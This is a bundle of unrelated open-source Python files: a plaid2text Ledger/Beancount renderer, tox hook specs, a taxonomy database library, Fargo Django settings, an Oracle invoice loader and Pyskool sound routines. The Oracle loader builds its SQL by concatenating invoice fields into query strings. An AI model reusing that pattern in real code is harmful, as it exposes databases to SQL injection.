pattern = row[0].strip()
payee = row[1].strip()
account = row[2].strip()
tags = row[3:]
if pattern.startswith('/') and pattern.endswith('/'):
try:
pattern = re.compile(pattern[1:-1], re.I)
except re.error as e:
print(
"Invalid regex '{0}' in '{1}': {2}"
.format(pattern, self.map_file, e),
file=sys.stderr)
sys.exit(1)
self.mappings.append((pattern, payee, account, tags))
def append_mapping_file(self, desc, payee, account, tags):
if self.map_file:
with open(self.map_file, 'a', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
ret_tags = tags if len(tags) > 0 else ''
writer.writerow([desc, payee, account, ret_tags])
def process_transactions(self, callback=None):
"""
Read transactions from Mongo (Plaid) and
process them. Writes Ledger/Beancount formatted
lines either to out_file or stdout.
Parameters:
callback: A function taking a single transaction update object to store
in the DB immediately after collecting the information from the user.
"""
out = self._process_plaid_transactions(callback=callback)
        if self.options.headers_file:
            with open(self.options.headers_file, mode='r') as f:
                print(f.read(), file=self.options.outfile)
print(*self.journal_lines, sep='\n', file=self.options.outfile)
return out
def _process_plaid_transactions(self, callback=None):
"""Process plaid transaction and return beancount/ledger formatted
lines.
"""
out = []
for t in self.transactions:
entry = Entry(t, self.options)
payee, account, tags = self.get_payee_and_account(entry)
dic = {}
dic['transaction_id'] = t['transaction_id']
dic['tags'] = tags
dic['associated_account'] = account
dic['payee'] = payee
dic['posting_account'] = self.options.posting_account
out.append(dic)
# save the transactions into the database as they are processed
if callback: callback(dic)
self.journal_lines.append(entry.journal_entry(payee, account, tags))
return out
def prompt_for_value(self, text_prompt, values, default):
sep = ':' if text_prompt == 'Payee' else ' '
a = prompt(
'{} [{}]: '.format(text_prompt, default),
completer=separator_completer(values, sep=sep)
)
# Handle tag returning none if accepting
return a if (a or text_prompt == 'Tag') else default
def get_payee_and_account(self, entry):
payee = entry.desc
account = self.options.default_expense
tags = ''
found = False
# Try to match entry desc with mappings patterns
for m in self.mappings:
pattern = m[0]
if isinstance(pattern, str):
if entry.desc == pattern:
payee, account, tags = m[1], m[2], m[3]
found = True # do not break here, later mapping must win
else:
# If the pattern isn't a string it's a regex
if m[0].match(entry.desc):
payee, account, tags = m[1], m[2], m[3]
found = True
# Tags gets read in as a list, but just contains one string
if tags:
tags = tags[0]
modified = False
if self.options.quiet and found:
pass
else:
if self.options.clear_screen:
print('\033[2J\033[;H')
print('\n' + entry.query())
value = self.prompt_for_value('Payee', self.possible_payees, payee)
if value:
modified = modified if modified else value != payee
payee = value
value = self.prompt_for_value('Account', self.possible_accounts, account)
if value:
modified = modified if modified else value != account
account = value
if self.options.tags:
value = self.prompt_for_tags('Tag', self.possible_tags, tags)
if value:
modified = modified if modified else value != tags
tags = value
if not found or (found and modified):
# Add new or changed mapping to mappings and append to file
self.mappings.append((entry.desc, payee, account, tags))
self.append_mapping_file(entry.desc, payee, account, tags)
# Add new possible_values to possible values lists
self.possible_payees.add(payee)
self.possible_accounts.add(account)
return (payee, account, tags)
@abstractmethod
def tagify(self, value):
pass
@abstractmethod
def get_possible_accounts_and_payees(self):
pass
@abstractmethod
def prompt_for_tags(self, prompt, values, default):
pass
class LedgerRenderer(OutputRenderer):
def tagify(self, value):
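        # e.g. 'online shopping' -> ':online-shopping:'; values already in
        # ':tag:' form (or '[bracketed]' values) pass through unchanged.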
if value.find(':') < 0 and value[0] != '[' and value[-1] != ']':
value = ':{0}:'.format(value.replace(' ', '-').replace(',', ''))
return value
def get_possible_accounts_and_payees(self):
if self.journal_file:
self.possible_payees = self._payees_from_ledger()
self.possible_accounts = self._accounts_from_ledger()
self.read_accounts_file()
def prompt_for_tags(self, prompt, values, default):
# tags = list(default[0].split(':'))
tags = [':{}:'.format(t) for t in default.split(':') if t] if default else []
value = self.prompt_for_value(prompt, values, ''.join(tags).replace('::', ':'))
while value:
if value[0] == '-':
value = self.tagify(value[1:])
if value in tags:
tags.remove(value)
else:
value = self.tagify(value)
if value not in tags:
tags.append(value)
value = self.prompt_for_value(prompt, values, ''.join(tags).replace('::', ':'))
return ''.join(tags).replace('::', ':')
def _payees_from_ledger(self):
return self._from_ledger('payees')
def _accounts_from_ledger(self):
return self._from_ledger('accounts')
def _from_ledger(self, command):
ledger = 'ledger'
for f in ['/usr/bin/ledger', '/usr/local/bin/ledger']:
if os.path.exists(f):
ledger = f
break
cmd = [ledger, '-f', self.journal_file, command]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout_data, stderr_data) = p.communicate()
items = set()
for item in stdout_data.decode('utf-8').splitlines():
items.add(item)
return items
def read_accounts_file(self):
""" Process each line in the specified account file looking for account
definitions. An account definition is a line containing the word
        'account' followed by a valid account name, e.g.:
account Expenses
account Expenses:Utilities
All other lines are ignored.
"""
if not self.options.accounts_file:
return
accounts = []
        pattern = re.compile(r'^\s*account\s+([:A-Za-z0-9-_ ]+)$')
with open(self.options.accounts_file, 'r', encoding='utf-8') as f:
for line in f.readlines():
mo = pattern.match(line)
if mo:
accounts.append(mo.group(1))
self.possible_accounts.update(accounts)
class BeancountRenderer(OutputRenderer):
import beancount
def tagify(self, value):
# No spaces or commas allowed
return value.replace(' ', '-').replace(',', '')
def get_possible_accounts_and_payees(self):
if self.journal_file:
self._payees_and_accounts_from_beancount()
def _payees_and_accounts_from_beancount(self):
try:
payees = set()
accounts = set()
tags = set()
from beancount import loader
from beancount.core.data import Transaction, Open
entries, errors, options = loader.load_file(self.journal_file)
        except Exception as e:
            print(e, file=sys.stderr)
            sys.exit(1)
else:
for e in entries:
if type(e) is Transaction:
if e.payee:
payees.add(e.payee)
if e.tags:
for t in e.tags:
tags.add(t)
if e.postings:
for p in e.postings:
accounts.add(p.account)
elif type(e) is Open:
accounts.add(e.account)
self.possible_accounts.update(accounts)
self.possible_tags.update(tags)
self.possible_payees.update(payees)
def prompt_for_tags(self, prompt, values, default):
        # Keep tags as a list of bare names; '#' is only added for display.
        tags = [t.replace('#', '') for t in default.split() if t] if default else []
        value = self.prompt_for_value(prompt, values, ' '.join(['#{}'.format(t) for t in tags]))
while value:
if value[0] == '-':
value = self.tagify(value[1:])
if value in tags:
tags.remove(value)
else:
value = self.tagify(value)
if value not in tags:
tags.append(value)
value = self.prompt_for_value(
prompt,
values,
' '.join(['#{}'.format(t) for t in tags])
)
return ' '.join(['#{}'.format(t) for t in tags])
|
madhat2r/plaid2text
|
src/python/plaid2text/renderers.py
|
Python
|
gpl-3.0
| 15,244
|
""" Hook specifications for tox.
"""
from pluggy import HookspecMarker, HookimplMarker
hookspec = HookspecMarker("tox")
hookimpl = HookimplMarker("tox")
@hookspec
def tox_addoption(parser):
""" add command line options to the argparse-style parser object."""
@hookspec
def tox_configure(config):
""" called after command line options have been parsed and the ini-file has
been read. Please be aware that the config object layout may change as its
API was not designed yet wrt to providing stability (it was an internal
thing purely before tox-2.0). """
@hookspec(firstresult=True)
def tox_get_python_executable(envconfig):
""" return a python executable for the given python base name.
The first plugin/hook which returns an executable path will determine it.
``envconfig`` is the testenv configuration which contains
per-testenv configuration, notably the ``.envname`` and ``.basepython``
setting.
"""
@hookspec(firstresult=True)
def tox_testenv_create(venv, action):
""" [experimental] perform creation action for this venv.
Some example usage:
- To *add* behavior but still use tox's implementation to set up a
virtualenv, implement this hook but do not return a value (or explicitly
return ``None``).
- To *override* tox's virtualenv creation, implement this hook and return
a non-``None`` value.
.. note:: This api is experimental due to the unstable api of
:class:`tox.venv.VirtualEnv`.
.. note:: This hook uses ``firstresult=True`` (see pluggy_) -- hooks
implementing this will be run until one returns non-``None``.
.. _pluggy: http://pluggy.readthedocs.io/en/latest/#first-result-only
"""
@hookspec(firstresult=True)
def tox_testenv_install_deps(venv, action):
""" [experimental] perform install dependencies action for this venv.
Some example usage:
- To *add* behavior but still use tox's implementation to install
dependencies, implement this hook but do not return a value (or
explicitly return ``None``). One use-case may be to install (or ensure)
non-python dependencies such as debian packages.
- To *override* tox's installation of dependencies, implement this hook
and return a non-``None`` value. One use-case may be to install via
a different installation tool such as `pip-accel`_ or `pip-faster`_.
.. note:: This api is experimental due to the unstable api of
:class:`tox.venv.VirtualEnv`.
.. note:: This hook uses ``firstresult=True`` (see pluggy_) -- hooks
implementing this will be run until one returns non-``None``.
.. _pip-accel: https://github.com/paylogic/pip-accel
.. _pip-faster: https://github.com/Yelp/venv-update
.. _pluggy: http://pluggy.readthedocs.io/en/latest/#first-result-only
"""
@hookspec
def tox_runtest_pre(venv):
""" [experimental] perform arbitrary action before running tests for this venv.
This could be used to indicate that tests for a given venv have started, for instance.
"""
@hookspec
def tox_runtest_post(venv):
""" [experimental] perform arbitrary action after running tests for this venv.
This could be used to have per-venv test reporting of pass/fail status.
"""
|
cvegaj/ElectriCERT
|
venv3/lib/python3.6/site-packages/tox/hookspecs.py
|
Python
|
gpl-3.0
| 3,276
|
"""
Provides classes that represent complete taxonomies, built using components from
the taxacomponents module.
"""
from taxacomponents import Citation, RankTable, Taxon
from taxonvisitor import TaxonVisitor
from taxonvisitors_concrete import PrintTaxonVisitor, CSVTaxonVisitor
from nameresolve import CoLNamesResolver
class TaxonomyError(Exception):
"""
A basic exception class for reporting errors encountered while working with taxonomies.
"""
def __init__(self, msg):
msg = 'Taxonomy error:\n ' + msg
Exception.__init__(self, msg)
class TaxonomyBase:
# Define the "nil" UUID constant as returned by the uuid-osp Postgres module
# function uuid_nil().
#NIL_UUID = '00000000-0000-0000-0000-000000000000'
NIL_UUID = 0
def __init__(self, taxonomy_id, name='', ismaster=False, citation=None, roottaxon=None):
self.taxonomy_id = taxonomy_id
self.name = name
self.ismaster = ismaster
self.citation = citation
self.roottaxon = roottaxon
def loadFromDB(self, pgcur, taxanum=-1, maxdepth=-1):
"""
Attempts to load the taxonomy from a taxonomy database, including the full tree
of taxa. If taxanum > 0, then only taxanum taxa will be loaded. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth.
"""
query = """SELECT name, citation_id, ismaster, root_tc_id
FROM taxonomies
WHERE taxonomy_id=?"""
pgcur.execute(query, (self.taxonomy_id,))
res = pgcur.fetchone()
        if res is None:
raise TaxonomyError('Taxonomy ID ' + str(self.taxonomy_id) + ' was not found in the database.')
self.name = res[0]
self.ismaster = res[2]
roottc_id = res[3]
# Create the Citation object.
self.citation = Citation()
self.citation.loadFromDB(pgcur, res[1])
# Get the rank ID and taxonomy ID of the root taxon concept.
query = """SELECT tc.rank_id, tc.taxonomy_id
FROM taxon_concepts tc, ranks r
WHERE tc.tc_id=? AND tc.rank_id=r.rank_id"""
pgcur.execute(query, (roottc_id,))
res = pgcur.fetchone()
rankid = res[0]
root_taxonomy_id = res[1]
# Initialize the rank lookup table.
rankt = RankTable()
rankt.loadFromDB(pgcur)
# Load the taxa tree.
self.roottaxon = Taxon(self.taxonomy_id, rankid, rankt, roottaxo_id = root_taxonomy_id, isroot=True)
self.roottaxon.loadFromDB(pgcur, roottc_id, taxanum, maxdepth)
def persist(self):
"""
Persist the Taxonomy to the database. This method should be implemented by
concrete subclasses.
"""
pass
def __str__(self):
tstr = 'name: ' + self.name + '\nID: ' + str(self.taxonomy_id) + '\nmaster: '
if self.ismaster:
tstr += 'yes'
else:
tstr += 'no'
return tstr
def printTaxonomyInfo(self):
"""
Prints the metadata that describes this taxonomy.
"""
print '** Taxonomy information **'
print str(self)
print str(self.citation)
def printCSVTaxaTree(self, numtaxa=-1, maxdepth=-1):
"""
        Prints the tree of taxa for this taxonomy in "flat" format as CSV output. If
numtaxa > 0, only the first numtaxa taxa will be printed. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth.
"""
if numtaxa > 0:
print '(Only printing first', numtaxa, 'taxa.)'
if maxdepth > -1:
print '(Only traversing taxa tree to a depth of ' + str(maxdepth) + '.)'
csvvisitor = CSVTaxonVisitor(numtaxa, maxdepth)
csvvisitor.visit(self.roottaxon)
def printTaxaTree(self, numtaxa=-1, maxdepth=-1):
"""
Prints the tree of taxa for this taxonomy. If numtaxa > 0, only the first numtaxa
taxa will be printed. If maxdepth > -1, the taxa tree will only be traversed to a
depth of maxdepth.
"""
print '** Taxa tree **'
if numtaxa > 0:
print '(Only printing first', numtaxa, 'taxa.)'
if maxdepth > -1:
print '(Only traversing taxa tree to a depth of ' + str(maxdepth) + '.)'
ptvisitor = PrintTaxonVisitor(numtaxa, maxdepth)
ptvisitor.visit(self.roottaxon)
def printAll(self, numtaxa=-1, maxdepth=-1):
"""
Prints a text representation of this taxonomy, including the tree of taxa.
If numtaxa > 0, only the first numtaxa taxa will be printed. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth.
"""
self.printTaxonomyInfo()
print
self.printTaxaTree(numtaxa, maxdepth)
class Taxonomy(TaxonomyBase):
"""
A class that represents a single taxonomy in the MOL taxonomy database. Provides methods
to load a taxonomy from the database and persist a taxonomy to the database. Can also link
a taxonomy to the backbone taxonomy.
"""
def __init__(self, taxonomy_id, name='', ismaster=False, citation=None, roottaxon=None):
TaxonomyBase.__init__(self, taxonomy_id, name, ismaster, citation, roottaxon)
# A reference for the backbone taxonomy, which encompasses all other taxonomies.
# This reference is used if this taxonomy is linked to the backbone taxonomy.
self.bb_taxonomy = None
def linkToBackbone(self, pgcur, adjustdepth=True):
"""
Tries to connect this taxonomy to the backbone taxonomy, creating new nodes
in the backbone taxonomy, if needed, to link the two together. If adjustdepth
is True, the depth property of all nodes in the taxonomy are set to match the
correct depth relative to the root of the backbone taxonomy. Returns True if
the linking operation succeeded, False otherwise.
"""
bb_taxonomy = BackboneTaxonomy(pgcur)
if bb_taxonomy.linkTaxonomy(self):
self.bb_taxonomy = bb_taxonomy
if adjustdepth:
self.bb_taxonomy.setNodeDepths()
return True
else:
self.bb_taxonomy = None
return False
def getBackboneTaxonomy(self):
"""
Returns a reference to the backbone taxonomy object that links this taxonomy
to the MOL backbone taxonomy.
"""
return self.bb_taxonomy
def persist(self, pgcur, printprogress=False):
"""
Writes the taxonomy information to the database, if it does not already
exist. This includes calling the persist() methods on the Citation and
Taxon tree associated with this Taxonomy object.
"""
# First, check if this taxonomy already exists in the database.
query = """SELECT taxonomy_id
FROM taxonomies
WHERE taxonomy_id=? AND ismaster=?"""
pgcur.execute(query, (self.taxonomy_id, self.ismaster))
res = pgcur.fetchone()
        if res is None:
# Write the citation information to the database, if needed.
citation_id = self.citation.persist(pgcur)
# Create the initial database entry for the taxonomy metadata so that the
# foreign key constraint for the child taxon concepts can be satisfied.
query = """INSERT INTO taxonomies
(taxonomy_id, name, citation_id, ismaster, root_tc_id)
VALUES (?, ?, ?, ?, ?)"""
pgcur.execute(query, (self.taxonomy_id, self.name, citation_id, self.ismaster, None))
# Make sure all taxon concepts, including those from the backbone taxonomy,
# are persisted to the database. Use the "nil" UUID as the parent_id for
# the root of the taxonomy if there is not an existing root entry.
        if self.bb_taxonomy is not None:
self.bb_taxonomy.roottaxon.persist(pgcur, self.NIL_UUID, printprogress,
self.roottaxon.depth)
else:
self.roottaxon.persist(pgcur, self.NIL_UUID, printprogress, self.roottaxon.depth)
# Get the ID of the root taxon.
root_tcid = self.roottaxon.existsInDB(pgcur)
# Update the taxonomy metadata entry with the root taxon concept ID.
query = """UPDATE taxonomies
SET root_tc_id=?
WHERE taxonomy_id=?"""
pgcur.execute(query, (root_tcid, self.taxonomy_id))
pgcur.connection.commit()
elif printprogress:
print ('The metadata for taxonomy "' + self.name + '" (ID ' + str(self.taxonomy_id) +
') already exist in the database; no changes were made.')
def printAll(self, numtaxa=-1, maxdepth=-1):
"""
Prints a text representation of this taxonomy, including the tree of taxa.
If numtaxa > 0, only the first numtaxa taxa will be printed. If maxdepth > -1,
the taxa tree will only be traversed to a depth of maxdepth. Unlike the method
in the base class, this method accounts for the possibility of this taxonomy
being linked to the backbone taxonomy.
"""
self.printTaxonomyInfo()
print
        if self.bb_taxonomy is not None:
self.bb_taxonomy.printTaxaTree(numtaxa, maxdepth)
else:
self.printTaxaTree(numtaxa, maxdepth)
class DepthAdjustVisitor(TaxonVisitor):
"""
Sets the "depth" values for all Taxon objects in a taxa tree, using an initial
starting depth value.
"""
def __init__(self, startdepth):
"""
Assigns startdepth as the "depth" value for the top-level Taxon object. All
other "depth" values are calculated relative to startdepth.
"""
TaxonVisitor.__init__(self)
self.startdepth = startdepth
def processTaxon(self, taxon, depth):
taxon.depth = self.startdepth + depth
class BackboneTaxonomy(TaxonomyBase):
"""
A special case of Taxonomy that represents the MOL backbone taxonomy. Provides
methods to link other taxonomies to the backbone taxonomy. Does not provide a
persist() method because the backbone taxonomy metadata are set when the database
tables are created.
"""
def __init__(self, pgcur):
"""
Initialize the backbone Taxonomy object and automatically load it from the
database, but load only the root node by default.
"""
self.pgcur = pgcur
# The ID of the backbone taxonomy is always 1.
TaxonomyBase.__init__(self, 1)
self.loadFromDB(pgcur)
def loadFromDB(self, pgcur, taxanum=-1, maxdepth=0):
"""
Exactly the same as loadFromDB() from the superclass, except loads only the root
taxonomy node (i.e., Eukaryota) by default.
"""
TaxonomyBase.loadFromDB(self, pgcur, taxanum, maxdepth)
def linkTaxonomy(self, taxonomy):
"""
Given a Taxonomy object, this method searches for the root taxon
concept in the database, verifies whether it is already connected to
the MOL backbone taxonomy, and if not, attempts to create the Taxon
objects needed to link it to the backbone taxonomy. To do this, the
method loads all ancestors of the root of the provided taxonomy, and
checks if the top-most ancestor is the root of the backbone taxonomy.
        If it is not, then Catalog of Life is used to try to infer the missing
        taxon nodes that connect the target taxonomy to the backbone taxonomy.
        If the linking is successful, the method returns True; otherwise, False
is returned.
"""
# Load any parent links to the target taxonomy from the database.
topnode = self.getLinksFromDB(taxonomy)
# See if we made it back to the root of the backbone taxonomy.
if topnode.equals(self.roottaxon):
# We did, so simply link the child of the returned node to our root taxon.
self.roottaxon.addChild(topnode.children[0])
success = True
else:
# Otherwise, try to use Catalog of Life to fill in any missing links.
success = self._buildCoLLinks(topnode)
return success
def _buildCoLLinks(self, taxon):
"""
Uses Catalog of Life to fill in missing taxa needed to link the target taxon to the
MOL backbone taxonomy. If linking was successful, the target taxon will be connected
to the backbone root taxon by one or more linking taxa. Returns True on success;
False otherwise.
"""
# Use the Catalog of Life names resolver to try to get higher taxonomy information
# for the taxon.
resolver = CoLNamesResolver()
searchres = resolver.searchCoLForTaxon(taxon, taxon.name.namestr, True)
if searchres == None:
return False
res, sname, srank, authorinfo = searchres
# Process each parent taxon in the CoL classification, creating a chain of Taxon
# objects to capture the higher taxonomy. Because the name resolver search method
# verifies that the kingdom is correct, we already know that we are connecting the
# taxonomy to the correct kingdom.
taxaxml = res.find('./classification')
# It is important that we use the rank system from the taxonomy (not the backbone)
# to ensure that rank name lookups retrieve the correct ID.
tranksys = taxon.ranksys
ranktable = taxon.rankt
curnode = self.roottaxon
for taxonxml in taxaxml:
namestr = taxonxml.find('name').text
rankstr = taxonxml.find('rank').text
child = curnode.createChild(ranktable.getID(rankstr, tranksys), namestr)
#print child
curnode = child
# Link the root of the target taxonomy to the backbone taxonomy.
curnode.addChild(taxon)
return True
def getLinksFromDB(self, taxonomy):
"""
Starting from the root node of the provided taxonomy, follows parent
links upward, building a chain of taxon objects until the top-most
parent is reached. Returns the top-most node that could be reached by
following the links upward.
"""
# See if the root taxon_concept already has a parent.
curnode = taxonomy.roottaxon
parent_id = taxonomy.roottaxon.getParentIDFromDB(self.pgcur)
# Follow parent links upwards until we reach the root or any other node
# that has no parent or does not yet exist in the database.
        while parent_id is not None and parent_id != self.NIL_UUID:
# Create the parent node and load it from the database.
parent = Taxon(curnode.taxonomy_id, curnode.rank_id, curnode.rankt)
parent.loadFromDB(self.pgcur, parent_id, maxdepth=0)
parent.addChild(curnode)
curnode = parent
parent_id = curnode.getParentIDFromDB(self.pgcur)
return curnode
def setNodeDepths(self):
"""
After linking a new taxonomy to the backbone taxonomy, the values of the depth
properties on the Taxon objects in the target taxonomy are likely to be incorrect.
This method will visit all nodes and set the correct value of the depth property
for each node.
"""
depthvisitor = DepthAdjustVisitor(0)
depthvisitor.visit(self.roottaxon)
|
stuckyb/sqlite_taxonomy
|
utilities/taxolib/taxonomy.py
|
Python
|
gpl-3.0
| 15,593
|
# Configuration for fargo.
# You can override Fargo default settings here
# Fargo is a Django application: for the full list of settings and their
# values, see https://docs.djangoproject.com/en/1.7/ref/settings/
# For more information on settings see
# https://docs.djangoproject.com/en/1.7/topics/settings/
# WARNING! Quick-start development settings unsuitable for production!
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# This file is sourced by "execfile" from /usr/lib/fargo/debian_config.py
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
#ADMINS = (
# # ('User 1', 'watchdog@example.net'),
# # ('User 2', 'janitor@example.net'),
#)
# ALLOWED_HOSTS must be correct in production!
# See https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = [
'*',
]
# Databases
# Default: a local database named "fargo"
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
# Warning: don't change ENGINE
# DATABASES['default']['NAME'] = 'fargo'
# DATABASES['default']['USER'] = 'fargo'
# DATABASES['default']['PASSWORD'] = '******'
# DATABASES['default']['HOST'] = 'localhost'
# DATABASES['default']['PORT'] = '5432'
LANGUAGE_CODE = 'fr-fr'
TIME_ZONE = 'Europe/Paris'
# Email configuration
# EMAIL_SUBJECT_PREFIX = '[fargo] '
# SERVER_EMAIL = 'root@fargo.example.org'
# DEFAULT_FROM_EMAIL = 'webmaster@fargo.example.org'
# SMTP configuration
# EMAIL_HOST = 'localhost'
# EMAIL_HOST_USER = ''
# EMAIL_HOST_PASSWORD = ''
# EMAIL_PORT = 25
# HTTPS Security
# CSRF_COOKIE_SECURE = True
# SESSION_COOKIE_SECURE = True
|
IMIO/docker-teleservices
|
config/fargo/settings.py
|
Python
|
gpl-3.0
| 1,635
|
# -*- coding: utf-8 -*-
from BaseOracle import *
from Factura import *
from ConfigDB import *
class CargaFacturaOracle(object):
def __init__(self):
pass
def carga(self, factura):
cfgOra = ConfigDB("oracle")
cfgOra.getConfig()
#cfgOra.imprimir()
oracle = BaseOracle(cfgOra.maquina, cfgOra.usuario, cfgOra.clave, cfgOra.servicio)
oracle.conectar()
oracle.ejecutar("delete ELE_DOCUMENTOS where CLAVE_ACCESO = '" + factura.claveAcceso + "'")
oracle.ejecutar("INSERT INTO ELE_DOCUMENTOS VALUES ('"
+ factura.claveAcceso + "','" + factura.documento + "','" + factura.razonSocial + "','"
+ factura.nombreComercial + "','" + factura.direccion + "','" + factura.establecimiento
+ "','"
+ factura.puntoEmision + "','" + factura.secuencial + "',TO_DATE('" + factura.fechaEmision
+ "', 'dd/mm/yyyy'),'" + factura.autorizacion + "','" + factura.tipo + "')")
i = 1
for det in factura.detalle:
oracle.ejecutar("INSERT INTO ELE_FACTURA_DETALLES"
+ "(CLAVE_ACCESO_ELE_DOCUMENTOS,NUMFILA,CODIGO_PRINCIPAL,DESCRIPCION,CANTIDAD,"
+ "PRECIO_UNITARIO,DESCUENTO,PRECIO_TOTAL_SIN_IMPUESTO)"
+ "VALUES ('" + factura.claveAcceso + "'," + str(i) + ",'" + det.codigoPrincipal + "','"
+ det.descripcion + "'," + str(det.cantidad) + "," + str(det.precioUnitario) + ","
+ str(det.descuento) + ","
+ str(det.total) + ")")
j = 1
for imp in det.impuesto:
oracle.ejecutar("INSERT INTO ELE_FACTURA_IMPUESTOS(CLAVE_ACCESO_ELE_DOCUMENTOS,"
+ "NUM_FILA_ELE_FACTURA_DETALLES,NUM_FILA,CODIGO,CODIGO_PORCENTAJE,TARIFA,"
+ "BASE_IMPONIBLE,VALOR) VALUES ('" + factura.claveAcceso + "'," + str(i) + ","
+ str(j) + ",'" + imp.codigo + "','" + imp.codigoPorcentaje + "',"
+ imp.tarifa + "," + imp.baseImponible + "," + imp.valor + ")")
j = j + 1
i = i + 1
oracle.desconectar()
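        # Note: the statements above splice values straight into the SQL text.
        # A safer sketch with DB-API bind variables (assuming BaseOracle
        # exposed its cursor; the names here are hypothetical):
        #     cur.execute("DELETE FROM ELE_DOCUMENTOS WHERE CLAVE_ACCESO = :1",
        #                 [factura.claveAcceso])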
|
jorjoluiso/RecupeEle
|
CargaFacturaOracle.py
|
Python
|
gpl-3.0
| 2,100
|
# -*- coding: utf-8 -*-
# Copyright 2013, 2014 Richard Dymond (rjdymond@gmail.com)
#
# This file is part of Pyskool.
#
# Pyskool is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# Pyskool is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# Pyskool. If not, see <http://www.gnu.org/licenses/>.
import os
import math
FRAME_T_STATES = 69888
INTERRUPT_DELAY = 942
CONTENTION_FACTOR = 0.34
SKOOL_DAZE = 'skool_daze'
BACK_TO_SKOOL = 'back_to_skool'
SKOOL_DAZE_TAKE_TOO = 'skool_daze_take_too'
EZAD_LOOKS = 'ezad_looks'
BACK_TO_SKOOL_DAZE = 'back_to_skool_daze'
NOTES = {
'F0': -7,
'G0': -6,
'A1': -5,
'B1': -4,
'C1': -3,
'D1': -2,
'E1': -1,
'F1': 0,
'G1': 1,
'A2': 2,
'B2': 3,
'C2': 4,
'D2': 5,
'E2': 6,
'F2': 7
}
# SD 32263, BTS 24560
PITCH_DATA = (
(47,196), # F1
(53,174), # G1
(60,154), # A2
(63,145), # B2
(71,129), # C2
(80,114), # D2
(86,107), # E2 ((90,101) in the original games, but unused)
(95,96), # F2
(107,86), # G2 (not in the original games)
)
def delays_to_samples(delays, sample_rate, max_amplitude):
sample_delay = 3500000.0 / sample_rate
samples = []
direction = 1
i = 0
d0 = 0
d1 = delays[i]
t = 0
while 1:
while t >= d1:
i += 1
if i >= len(delays):
break
d0 = d1
d1 += delays[i]
direction *= -1
if i >= len(delays):
break
sample = direction * int(max_amplitude * math.sin(math.pi * (t - d0) / (d1 - d0)))
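        # Clamp to the signed 16-bit range, then store negative values in
        # unsigned 16-bit two's-complement form (so -32768 is written as 32768).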
if sample > 32767:
sample = 32767
elif sample < -32768:
sample = 32768
elif sample < 0:
sample += 65536
samples.append(sample)
t += sample_delay
return samples
def add_contention(delays, contention=True, interrupts=False, cycle=0):
c_start = 14334
c_end = 57248
for i, delay in enumerate(delays):
d = 0
while d < delay:
if interrupts and cycle == 0:
cycle = INTERRUPT_DELAY
if i:
delay += INTERRUPT_DELAY
end = min(FRAME_T_STATES, cycle + delay - d)
if contention and c_start <= end and cycle < c_end:
contended_cycles = min(c_end, end) - max(cycle, c_start)
delay += int(contended_cycles * CONTENTION_FACTOR)
d += end - cycle
cycle = end % FRAME_T_STATES
delays[i] = delay
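# The helpers below model the delay loops of the original Z80 sound routines;
# the numbers in their names are the routines' addresses in Skool Daze (sd)
# and Back to Skool (bts).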
def sd65122(d, e, h):
delays = []
for n in range(d or 256):
delays.append(13 * (e or 256) + 50)
e = (e + h) & 255
return delays
def bts62155(d, e, h):
delays = []
for n in range(d or 256):
delays.append(13 * (e or 256) + 50)
e = (e + h) & 255
if d & 1:
delays.append(13 * (e or 256) + 52)
return delays
def bts29836(b, de):
e, d = de % 256, de // 256
inner_delay = 13 * (b or 256) + 30
delays = [inner_delay] * ((e or 256) - 1)
if d > 1:
outer_delay = inner_delay + 11
inner_delays = [inner_delay] * 255
for n in range(d - 1):
delays.append(outer_delay)
delays.extend(inner_delays)
if de & 1 == 0:
delays.append(inner_delay + 13)
return delays
def jump():
# SD 60139
delays = sd65122(50, 96, 3)
delays.append(3282)
delays += [2532] * 7 # Walking sound (SD 65088)
add_contention(delays, contention=False, interrupts=True)
return delays
def catapult():
# SD 65141, BTS 63861
delays = sd65122(128, 0, 248)
add_contention(delays, contention=False, interrupts=True)
return delays
def shield():
# SD 58604
return sd65122(64, 0, 254) * 16
def hit(cycle):
# SD 60128
delays = [2532] * 15
delays[7] = 2589
add_contention(delays, contention=False, interrupts=True, cycle=cycle)
return delays
def hit0():
return hit(17472)
def hit1():
return hit(17472 * 3)
def bingo():
# BTS 62178#62404
delays = bts62155(255, 255, 255)
delays += ([83] + delays) * 4
add_contention(delays, contention=False, interrupts=True)
return delays
def sherry():
# BTS 23907#23988
delays = bts62155(0, 0, 2)
add_contention(delays, contention=False, interrupts=True)
return delays
def knocked_out():
# SD 65111, BTS 62094#62147
delays = sd65122(0, 0, 1)
add_contention(delays, contention=False, interrupts=True)
return delays
def mouse():
# BTS 28952#28964
squeak = bts29836(26, 1632)
pause_delay = 399464 + squeak[0]
delays = squeak + ([pause_delay] + squeak[1:]) * 2
add_contention(delays, interrupts=True)
return delays
def conker():
# BTS 29896#29978
delays = bts29836(40, 10240)
add_contention(delays, interrupts=True)
return delays
def safe_key():
# BTS 30804#30853
delays = bts29836(1, 256)
for n in range(255, 0, -1):
subdelays = bts29836((n & 63) + 1, 256)
delays.append(119 + subdelays[0])
delays.extend(subdelays[1:])
add_contention(delays, interrupts=True)
return delays
def bts_bell():
# BTS 32433#32492
delays = bts29836(128, 4096)
add_contention(delays, interrupts=True)
return delays
def sd_bell():
# SD 26450
delays = [1718] * 4600
add_contention(delays)
return delays
def sd_lines1():
# SD 30464#30544
delays = []
inner_delays = [296] * 255
for d in range(39):
delays.extend(inner_delays)
delays.append(307)
delays.extend(inner_delays)
add_contention(delays, interrupts=True)
return delays
def sd_lines2():
# SD 30464#30575
delays = []
inner_delays = [686] * 255
for d in range(19):
delays.extend(inner_delays)
delays.append(697)
delays.extend(inner_delays)
add_contention(delays, interrupts=True)
return delays
def bts_lines1():
# BTS 29716#29790
delays = bts29836(20, 10240)
add_contention(delays, interrupts=True)
